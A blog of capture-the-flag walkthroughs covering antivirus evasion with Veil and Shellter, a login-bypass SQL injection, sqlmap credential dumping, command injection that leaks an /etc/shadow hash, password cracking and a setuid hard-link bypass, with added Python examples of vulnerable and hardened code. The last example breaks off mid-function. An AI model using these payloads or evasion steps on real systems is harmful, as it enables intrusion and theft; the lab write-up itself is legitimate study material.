<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiySc2P0kgOfvogdCRfEkheUYbOnNTu6LsVrEpoCEI9Yy2I2zL7K9h2CaXFZm79bpjLCRu2nTG79LGvKTGGuTxTRqJXH2BJyr61zYAgaCvJR50bN0dmO8kg3_nvtJx0aiLdfd6SK870_OM/s1600/veil_payloads.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiySc2P0kgOfvogdCRfEkheUYbOnNTu6LsVrEpoCEI9Yy2I2zL7K9h2CaXFZm79bpjLCRu2nTG79LGvKTGGuTxTRqJXH2BJyr61zYAgaCvJR50bN0dmO8kg3_nvtJx0aiLdfd6SK870_OM/s400/veil_payloads.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Good, let's use payload <b>35</b>, for example.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcJ282GSTWXBjn3l392hoGmhEqG-AXsilwtUos1ZL9D_HIhMbt6ViAqFgEV1K8_5uYk3B9Meg4m_WEGufbyhrbjBhxwHnhQE3Lmq6JOpz-0p75YOBejgsNi4jjXcbU7A2qUuiInMSqcig/s1600/veil_av.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcJ282GSTWXBjn3l392hoGmhEqG-AXsilwtUos1ZL9D_HIhMbt6ViAqFgEV1K8_5uYk3B9Meg4m_WEGufbyhrbjBhxwHnhQE3Lmq6JOpz-0p75YOBejgsNi4jjXcbU7A2qUuiInMSqcig/s400/veil_av.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Quite nice! Detection ratio is lower than 50%.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3. Shellter</div>
<div class="separator" style="clear: both; text-align: left;">
Shellter is the most effective of these tools at bypassing AV detection. Shellter takes a non-malicious program such as putty.exe and injects the malicious instructions into it.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcV44PU9xxXa446_TwEneSOZobNiZBoHBsxZHsZB6caF2nKCVog-bD01HsdapD6Pn1xQnJYBPbQJ3mZTAHzvK9P5YdrsAP7BWALqibLKmOgnV_6z05G74aqPmMmDKdhzAUhPkQLDVRZCI/s1600/shellter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcV44PU9xxXa446_TwEneSOZobNiZBoHBsxZHsZB6caF2nKCVog-bD01HsdapD6Pn1xQnJYBPbQJ3mZTAHzvK9P5YdrsAP7BWALqibLKmOgnV_6z05G74aqPmMmDKdhzAUhPkQLDVRZCI/s400/shellter.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We can use <b>A (automatic)</b> mode. Next we have to set the PE target, the file into which we will inject.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA2hMngCReiY10L24sCanrjJU93fyFvqr_-4beB2pFsQ_CC4hSzbIEY4LNsmMvHVyKCw5Au3fZNtYc3cjWvPoF_EyPOvxla5pbNK-TV_O_wycj1RtgoH05qOQIEOMt7cz1czWI3NK-Fcs/s1600/shellter_koniec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA2hMngCReiY10L24sCanrjJU93fyFvqr_-4beB2pFsQ_CC4hSzbIEY4LNsmMvHVyKCw5Au3fZNtYc3cjWvPoF_EyPOvxla5pbNK-TV_O_wycj1RtgoH05qOQIEOMt7cz1czWI3NK-Fcs/s400/shellter_koniec.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Great! For me the detection ratio is now very low, isn't it?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As we can see, <b>Shellter</b> is a very effective tool for AV evasion.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
DC146:2016 dick dastardly (rgolebiowski, published 2017-02-13)<br />
<br />
Hello,<br />
<br />
Now it is the turn of the <b>dick dastardly</b> challenge!<br />
<br />
Scanning all ports...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIxRDwfoFiEY51xHhFAE5uAsDLXGKzXCgj7qoDuPWH0hYFTiUZezki1dnO2H7q15EwviGzJcnQyfQcmHpL00Rf9znhIAyn_5vKgAI3D8fyVxfHSALOPLluwCovXTCTnnqOyiURkx2J4vU/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIxRDwfoFiEY51xHhFAE5uAsDLXGKzXCgj7qoDuPWH0hYFTiUZezki1dnO2H7q15EwviGzJcnQyfQcmHpL00Rf9znhIAyn_5vKgAI3D8fyVxfHSALOPLluwCovXTCTnnqOyiURkx2J4vU/s400/nmap.png" width="400" /></a></div>
<br />
Enumerating web pages<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLbeKopYQJRlcqeNZahP5pjS4Jg6kqMGbxEYzfs_ItaV2xANYUewTfgPMBbHa7kv3TLmCnclhulYI7kn1HDGDzFGlRUbr_nzOGM3XQdoJZTSdqTqwm8hVqwFPAKEU4yCh9SZK_rscMyhk/s1600/dirb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLbeKopYQJRlcqeNZahP5pjS4Jg6kqMGbxEYzfs_ItaV2xANYUewTfgPMBbHa7kv3TLmCnclhulYI7kn1HDGDzFGlRUbr_nzOGM3XQdoJZTSdqTqwm8hVqwFPAKEU4yCh9SZK_rscMyhk/s400/dirb.png" width="400" /></a></div>
<br />
Excellent! The dirb scanner found several interesting files on our target.<br />
The <b>admin.php</b> page redirects us to <b>index.php</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNFCF8CLjEAsRjb_y2j73mTaTDbLFKgJ3wRMiPLgZzVkU7OFhvb4yJW59YTWygBAfzd8bnUq_QtS-_mq1fiT8VqSQxPdkrruaBaQ6An2rpM8FH2WpVgXUmFVPbFqdOkEJkB9jMEJcSNoM/s1600/admin.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNFCF8CLjEAsRjb_y2j73mTaTDbLFKgJ3wRMiPLgZzVkU7OFhvb4yJW59YTWygBAfzd8bnUq_QtS-_mq1fiT8VqSQxPdkrruaBaQ6An2rpM8FH2WpVgXUmFVPbFqdOkEJkB9jMEJcSNoM/s400/admin.png" width="400" /></a></div>
<br />
Very interesting. Filling in <b>admin</b> as the username and <b>' OR 1=1 -- -</b> as the password, we get the following result<br />
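As an added example, not code from the original post, here is the kind of string-built login query that this payload bypasses, beside a parameterised and hashed replacement that it does not; the table, the admin password and the SQLite backend are constructed for the demo.

```python
"""Login-bypass SQL injection (' OR 1=1 -- -) against a string-built query,
beside a parameterised, hashed replacement. Added example, not code from the
original post; the admins table and its password are constructed for the demo."""
import hashlib
import hmac
import os
import sqlite3

ADMIN_PASSWORD = "constructed-demo-password"   # constructed, not the box's
BYPASS_PAYLOAD = "' OR 1=1 -- -"               # the payload used in the post


def make_vulnerable_db():
    """Schema shaped like the sqlmap dump: id, pass (plaintext), user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (id INTEGER PRIMARY KEY, pass TEXT, user TEXT)")
    conn.execute("INSERT INTO admins (pass, user) VALUES (?, ?)", (ADMIN_PASSWORD, "admin"))
    return conn


def login_vulnerable(conn, user, password):
    """Builds the SQL by string formatting, so input becomes SQL syntax.
    With the password ' OR 1=1 -- - the WHERE clause turns into
        user = 'admin' AND pass = '' OR 1=1 -- -'
    which is true for every row; the comment swallows the dangling quote."""
    query = f"SELECT id FROM admins WHERE user = '{user}' AND pass = '{password}'"
    return conn.execute(query).fetchone() is not None


def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt, stored as salt_hex$hash_hex."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(stored, candidate):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, _ = stored.split("$", 1)
    expected = hash_password(candidate, bytes.fromhex(salt_hex))
    return hmac.compare_digest(expected, stored)


def make_hardened_db():
    """Same table, but the pass column holds a salted hash, never plaintext."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (id INTEGER PRIMARY KEY, pass TEXT, user TEXT UNIQUE)")
    conn.execute("INSERT INTO admins (pass, user) VALUES (?, ?)",
                 (hash_password(ADMIN_PASSWORD), "admin"))
    return conn


def login_hardened(conn, user, password):
    """Parameterised lookup: the driver passes user as data, never as SQL,
    and the candidate password never reaches the database at all."""
    row = conn.execute("SELECT pass FROM admins WHERE user = ?", (user,)).fetchone()
    if row is None:
        hash_password(password)  # spend the same hashing cost for unknown users
        return False
    return verify_password(row[0], password)


if __name__ == "__main__":
    vuln, hard = make_vulnerable_db(), make_hardened_db()
    print("vulnerable, bypass payload :", login_vulnerable(vuln, "admin", BYPASS_PAYLOAD))
    print("hardened,   bypass payload :", login_hardened(hard, "admin", BYPASS_PAYLOAD))
    print("hardened,   real password  :", login_hardened(hard, "admin", ADMIN_PASSWORD))
```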
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLU7OskZjH28oTfFb91UEyQ5Jgg3Wf7o2bVXz4CIqiSeMSfX01gPRCyktnZgL3oPNYeNsRNKZVQlXkNOPjXgNuZaLvU2ys3hjNwmEKxxhhlOcuA5GEingMO55T2UFyKTAUm-TEK4O8GqI/s1600/adminek.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLU7OskZjH28oTfFb91UEyQ5Jgg3Wf7o2bVXz4CIqiSeMSfX01gPRCyktnZgL3oPNYeNsRNKZVQlXkNOPjXgNuZaLvU2ys3hjNwmEKxxhhlOcuA5GEingMO55T2UFyKTAUm-TEK4O8GqI/s400/adminek.png" width="400" /></a></div>
<br />
Nice! Now we are able to use <b>sqlmap</b> and try to find valid credentials.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvS87WWp-dpNEuLsqAAOgjaZrasiNuSuGi1-35re5lp84WW8aP_qsoFwkXpvEwUH2tUqQEt87QDwER6O49JOaYm2maXSusHtptknIelcllr7IHqJMf4LxX-A2j8BNYejW8kLGBUOOpD8/s1600/sqlmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfvS87WWp-dpNEuLsqAAOgjaZrasiNuSuGi1-35re5lp84WW8aP_qsoFwkXpvEwUH2tUqQEt87QDwER6O49JOaYm2maXSusHtptknIelcllr7IHqJMf4LxX-A2j8BNYejW8kLGBUOOpD8/s400/sqlmap.png" width="400" /></a></div>
<br />
Good, let's enumerate deeper! Unfortunately we are not able to retrieve the database names this way, so we have to look for another opportunity to get them.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga9sGSEuN5kD2xVKgRiWjhyphenhyphentkcv1Vb6yC-sAhR4AJCOb8f2LLa4JEAy898IwgN-3gFkvWoGUKiC8P-mfGZ_kQfjBtSZM8EzgFW7rGXZFinuHMb7SUJxGiZHBdMR-4XOWQpjVnX8Lk5m5s/s1600/nmap1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga9sGSEuN5kD2xVKgRiWjhyphenhyphentkcv1Vb6yC-sAhR4AJCOb8f2LLa4JEAy898IwgN-3gFkvWoGUKiC8P-mfGZ_kQfjBtSZM8EzgFW7rGXZFinuHMb7SUJxGiZHBdMR-4XOWQpjVnX8Lk5m5s/s400/nmap1.png" width="400" /></a></div>
<br />
Excellent! We found a second vulnerable parameter. Let's enumerate the databases<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVFvO4kCoKRNPh2stqyKsPpK98MbVzW7ZKrxSBU4CcymBcvkT8gMXzyCmb2cNE3gMxNMdLHgeYTl_6Op9TEP1vKVfekLTbj4H3Du94rd7cW9umO0R1fYE4TBKbBLB6hg_vqQsGLmjti8Q/s1600/dbs.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVFvO4kCoKRNPh2stqyKsPpK98MbVzW7ZKrxSBU4CcymBcvkT8gMXzyCmb2cNE3gMxNMdLHgeYTl_6Op9TEP1vKVfekLTbj4H3Du94rd7cW9umO0R1fYE4TBKbBLB6hg_vqQsGLmjti8Q/s200/dbs.png" width="200" /></a></div>
<br />
Very good, let's examine <b>vulnhub</b> database.<br />
<blockquote class="tr_bq">
<pre>Database: vulnhub
Table: admins
[1 entry]
+----+--------------------------------------+--------+
| id | pass                                 | user   |
+----+--------------------------------------+--------+
| 1  | 1b37y0uc4n76u3557h15p455w0rd,5uck3rz | rasta  |
+----+--------------------------------------+--------+</pre>
</blockquote>
It is not a valid SSH password for the <b>rasta</b> user :( I don't know what the password is for.<br />
After clicking on <b>add IP to IRC whitelist</b> I ran the nmap scan again and got a very interesting result<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyj0xGi6ua_p4Gfwxl9kpVgveQ7vX8hDEq3Yer80fDhV3t7WiX4zO9G7lKDE4BZoKIn4S2J00RQ0W37QFVfIVtKmWEDKcTTiK6AyVI4Wmm-AqrqAqPO1NuqttMloE_N9_27UtlQ0AdkbY/s1600/irc.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyj0xGi6ua_p4Gfwxl9kpVgveQ7vX8hDEq3Yer80fDhV3t7WiX4zO9G7lKDE4BZoKIn4S2J00RQ0W37QFVfIVtKmWEDKcTTiK6AyVI4Wmm-AqrqAqPO1NuqttMloE_N9_27UtlQ0AdkbY/s400/irc.png" width="400" /></a></div>
<br />
Very good! I installed <b>irssi</b> on my attacker machine and connected to the target's IRC server.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGgTaMY81Dubrd4Rv_yWUsCcq5_8T4GsHqSjgLzuO_ERLhOSvHvew_31vOAjo0dNM9YOzLIo_m6UwCQ2Tzk3zWYRtmKRwmd2y8XF2ooxHc2ulO3rPtdV0Bhv7Cpt0vR0FWzTCI186Wy8I/s1600/irc1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGgTaMY81Dubrd4Rv_yWUsCcq5_8T4GsHqSjgLzuO_ERLhOSvHvew_31vOAjo0dNM9YOzLIo_m6UwCQ2Tzk3zWYRtmKRwmd2y8XF2ooxHc2ulO3rPtdV0Bhv7Cpt0vR0FWzTCI186Wy8I/s320/irc1.png" width="320" /></a></div>
<br />
<br />
Author: rgolebiowski (http://www.blogger.com/profile/06575754454762912759)<br />
<br />
<b>DC416:2016 fortress challenge</b> (published 2017-02-09, updated 2017-02-10)<br />
Hello,<br />
Now it's time to tackle the <b>fortress</b> challenge.<br />
<br />
The scanning phase gave the following result<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5xY99ShH-V-nD87CRwAzSEXZ1ci9f5B-gtp602zJyu9r9l9omZB8aSksdMFUdzNB3ktnloIdKahnEc6BIA_N9-3DbhXGqUYAgCdiPPNAlUPQ_zcuuYt3UEesRALQdxzEIaZFuXO4X2FI/s1600/fortress_nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5xY99ShH-V-nD87CRwAzSEXZ1ci9f5B-gtp602zJyu9r9l9omZB8aSksdMFUdzNB3ktnloIdKahnEc6BIA_N9-3DbhXGqUYAgCdiPPNAlUPQ_zcuuYt3UEesRALQdxzEIaZFuXO4X2FI/s640/fortress_nmap.png" width="640" /></a></div>
<br />
Our situation is simple: only three open ports.<br />
So, let's begin our penetration test with the web application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfoXVwNX3nJVRsSyWAknW_zi1XoBWAbQ9T_r-mFyfdktnJiTG0tPFNOeMBYfq5X618QplVoJVpNPgW5tN_ZRSgeTvZjnEEwOqkVMmBdrpbDFtzN_MkNNA052oWfUcKg7B4Sa7HCOhdM4w/s1600/fortress_dirb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfoXVwNX3nJVRsSyWAknW_zi1XoBWAbQ9T_r-mFyfdktnJiTG0tPFNOeMBYfq5X618QplVoJVpNPgW5tN_ZRSgeTvZjnEEwOqkVMmBdrpbDFtzN_MkNNA052oWfUcKg7B4Sa7HCOhdM4w/s400/fortress_dirb.png" width="400" /></a></div>
<br />
Excellent! We discovered the <b>scanner.php</b> file. Let's examine it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ehjXMbgCIQUS6PoHtAwnIvySVvBxv8zy4HeD5U9JvNTdD_tSu8BkEORqTE01kTXJ5Z3lS2YlWrbexbp2OVWXGhdcboUsZUNMjljbkRZjUaO8MzEokRDToksOVb5ojHXDVlNuF3j6Jd4/s1600/scanner.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ehjXMbgCIQUS6PoHtAwnIvySVvBxv8zy4HeD5U9JvNTdD_tSu8BkEORqTE01kTXJ5Z3lS2YlWrbexbp2OVWXGhdcboUsZUNMjljbkRZjUaO8MzEokRDToksOVb5ojHXDVlNuF3j6Jd4/s400/scanner.png" width="400" /></a></div>
<br />
OK, we now know how this scanner works and what the nmap command it runs looks like.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDzfOjX6dN8CRR6BgbVyDPTc58KD4hGfA65du_1KKlFmpXnmfC5HvW3CeLY4qtrseC4Z58IdodLHjIjoYhf-1sLtF6WH1H9lGHGVYUEYaIUREuUpLmA0GDYrPitjVl5KKz0p6Jx0exDyc/s1600/burp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDzfOjX6dN8CRR6BgbVyDPTc58KD4hGfA65du_1KKlFmpXnmfC5HvW3CeLY4qtrseC4Z58IdodLHjIjoYhf-1sLtF6WH1H9lGHGVYUEYaIUREuUpLmA0GDYrPitjVl5KKz0p6Jx0exDyc/s400/burp.png" width="400" /></a></div>
<br />
We appended <b>id</b> to the input, so let's see what the result looks like.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWgNumSq-dc225qK3HoSJ3Q_ODnvSauhHvATDHje2nLmRhLnsyj_SaTH20Nblgn770IStzJRwQ8LbCfeSwUIAsGxgL27DErKqcIhACggnFj-uczHPCRHFLvg4_3mglumGNElsNLcBAiEs/s1600/id.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWgNumSq-dc225qK3HoSJ3Q_ODnvSauhHvATDHje2nLmRhLnsyj_SaTH20Nblgn770IStzJRwQ8LbCfeSwUIAsGxgL27DErKqcIhACggnFj-uczHPCRHFLvg4_3mglumGNElsNLcBAiEs/s400/id.png" width="400" /></a></div>
<br />
Excellent! It works. So, let's examine the target more deeply.<br />
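The source of scanner.php is not shown on the page, so the following is an added Python model of the same bug class, written for this walkthrough and not the challenge's own code: a scanner that splices the user-supplied target into a shell command line, beside a hardened version that validates the target and passes it as a separate argv element so no shell ever parses it. The <b>scanner</b> argument defaulting to <b>echo</b> is a stand-in for nmap so the example runs anywhere; the payload <b>127.0.0.1; id</b> mirrors what was appended in Burp above.<br />

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: labels of letters, digits and hyphens (no leading/trailing
# hyphen), joined by dots.  Anything else, including ';', '|', '$(' or spaces,
# simply does not match.
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_command(target, scanner="nmap -F"):
    """Build the command the way a naive scanner.php would: string concatenation.
    Everything after ';', '|', '&&' or a newline becomes a second shell command."""
    return f"{scanner} {target}"


def run_vulnerable(target, scanner="echo"):
    """Run the concatenated string through /bin/sh (shell=True), which is exactly the
    primitive an injection abuses.  'echo' stands in for nmap so this runs offline."""
    result = subprocess.run(
        vulnerable_command(target, scanner), shell=True, capture_output=True, text=True
    )
    return result.stdout


def validate_target(target):
    """Accept a single IP address or an RFC 1123 hostname; reject everything else."""
    try:
        ipaddress.ip_address(target)
        return target
    except ValueError:
        pass
    if len(target) <= 253 and HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"invalid scan target: {target!r}")


def safe_command(target, scanner=("nmap", "-F")):
    """Validated target passed as its own argv element: no shell, no metacharacters."""
    return [*scanner, validate_target(target)]


def run_safe(target, scanner=("echo",)):
    result = subprocess.run(safe_command(target, scanner), capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    payload = "127.0.0.1; id"
    print("vulnerable output:\n" + run_vulnerable(payload))   # echo line, then uid=...
    try:
        run_safe(payload)
    except ValueError as exc:
        print("hardened:", exc)
```

The validation is an allowlist, not a blocklist of bad characters: a scanner that only strips <b>;</b> still falls to <b>|</b>, <b>$( )</b>, backticks or a newline, whereas a target that must parse as an address or hostname leaves nothing for the shell to interpret.<br />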
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixinkV8Nw0RGQSaO9WExqV1Bzj-1z-eniOsOmiz_WOq-7j4JBkrw662wtN5jLWmIQRCwIdiI7okj8qwFguro2ElvYK0Cb7S4V2HcLMWbrVdxjUAcU8QS5_PDfJqgpVtqfQ32XSjrfDBY8/s1600/repeater.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixinkV8Nw0RGQSaO9WExqV1Bzj-1z-eniOsOmiz_WOq-7j4JBkrw662wtN5jLWmIQRCwIdiI7okj8qwFguro2ElvYK0Cb7S4V2HcLMWbrVdxjUAcU8QS5_PDfJqgpVtqfQ32XSjrfDBY8/s640/repeater.png" width="640" /></a></div>
<br />
Great! We have got something that looks like a line from <b>/etc/shadow</b>.<br />
After a lot of cracking time (the hash is SHA-512 crypt, <b>$6$</b>, which is slow to brute-force by design)...<br />
<blockquote class="tr_bq">
<pre><code>$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:931qwerty?</code></pre>
</blockquote>
Good. We know the SSH port is open, so let's try the cracked password there.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG5a-dfYlWPotitfFW2AoJsRIQ2kFn8JjoEFOMZjYYnHulMI4LphTE7tz_YRHMVo45S2CQbGxSW7DJHNs8V6OJ4tFJXgCV7eymG6oMdx1v64Jjzmw4Y3ernyK561AJRDU6x3aSYTH1WFo/s1600/ssh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="463" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjG5a-dfYlWPotitfFW2AoJsRIQ2kFn8JjoEFOMZjYYnHulMI4LphTE7tz_YRHMVo45S2CQbGxSW7DJHNs8V6OJ4tFJXgCV7eymG6oMdx1v64Jjzmw4Y3ernyK561AJRDU6x3aSYTH1WFo/s640/ssh.png" width="640" /></a></div>
<br />
We obtained a limited shell! Unfortunately, the goal of this challenge is only to find the flags.<br />
<br />
<b>Flag #1</b><br />
<blockquote class="tr_bq">
$ cat flag.txt <br />
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}<br />
$ pwd<br />
/usr/home/craven</blockquote>
<b>Flag #2</b><br />
Looking for the next flag, I found this in the <b>/usr/local/www/</b> directory<br />
<blockquote class="tr_bq">
$ ls<br />
index.html k1ngd0m_k3yz logo.png s1kr3t scanner.php styles.css<br />
$ cd s1kr3t/<br />
$ ls<br />
flag.txt<br />
$ cat flag.txt <br />
FLAG{n0_one_br3aches_teh_f0rt}</blockquote>
<b>Flag #3</b> <br />
The last flag is located in <b>/home/vulnhub/</b> directory<br />
<blockquote class="tr_bq">
$ ls<br />flag.txt reader<br />$ cat flag.txt <br />cat: flag.txt: Permission denied</blockquote>
Hmmm, that's no surprise :-) So, let's examine the <b>reader</b> file<br />
<blockquote class="tr_bq">
$ file reader <br />reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped<br />$ ./reader <br />./reader [file to read]</blockquote>
Very useful! <b>reader</b> is a setuid binary that reads files for us, so it may be able to read what our own user cannot.<br />
<blockquote class="tr_bq">
$ ./reader /etc/passwd<br />Checking file type...<br />Checking if flag file...<br />Great! Printing file contents...<br />Win, here's your flag: <br /># $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $</blockquote>
Hmmm, a little strange: it printed only the first line of the file.<br />
<blockquote class="tr_bq">
$ ./reader flag.txt<br />Checking file type...<br />Checking if flag file...<br />Nope. Can't let you have the flag.</blockquote>
Hmmm, let's try creating a symlink to <b>flag.txt</b><br />
<blockquote class="tr_bq">
$ ln -s flag.txt /tmp/flagg.txt<br />$ ./reader /tmp/flagg.txt<br />Checking file type...<br />Symbolic links not allowed!</blockquote>
Grrrr, maybe a hard link will lead us to success?<br />
<blockquote class="tr_bq">
$ ln -f flag.txt /tmp/flagh.txt<br />$ ./reader /tmp/flagh.txt <br />Checking file type...<br />Checking if flag file...<br />Nope. Can't let you have the flag.<br />$ ln -f flag.txt /tmp/test<br />$ ./reader /tmp/test <br />Checking file type...<br />Checking if flag file...<br /><b>Great! Printing file contents...<br />Win, here's your flag: <br />FLAG{its_A_ph0t0_ph1ni5h}</b></blockquote>
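The reader binary's source isn't on the page, but its messages suggest it refuses symlinks, refuses anything whose name looks like a flag file, and prints the first line of whatever is left. The added Python example below (mine, not the challenge's code; the checks are reconstructed from the messages and are an assumption) models that logic and shows why a hard link under an innocent name slips past it, then gives a check that holds: a setuid reader should decide on the real user's permissions (<b>os.access</b> uses the real uid) and on the file's identity (<b>st_dev</b>, <b>st_ino</b>) rather than on the spelling of the path. File names and the scratch directory are constructed for the demo.<br />

```python
import os
import stat
import tempfile


def first_line(path):
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return fh.readline().rstrip("\n")


def weak_reader(path):
    """Model of the challenge binary's checks, reconstructed from its messages
    (an assumption, not its real source): no symlinks, no name containing 'flag'."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return "Symbolic links not allowed!"
    if "flag" in os.path.basename(path).lower():      # name-based: a hard link dodges it
        return "Nope. Can't let you have the flag."
    return "Win, here's your flag: " + first_line(path)


def hardened_reader(path, protected):
    """Same interface, but the decision is made on the caller's real permissions and on
    the inode, which every hard link shares, not on how the path is spelled."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return "Symbolic links not allowed!"
    if not os.access(path, os.R_OK):    # checks the *real* uid, even in a setuid process
        return "Nope. You cannot read that."
    ident = (st.st_dev, st.st_ino)
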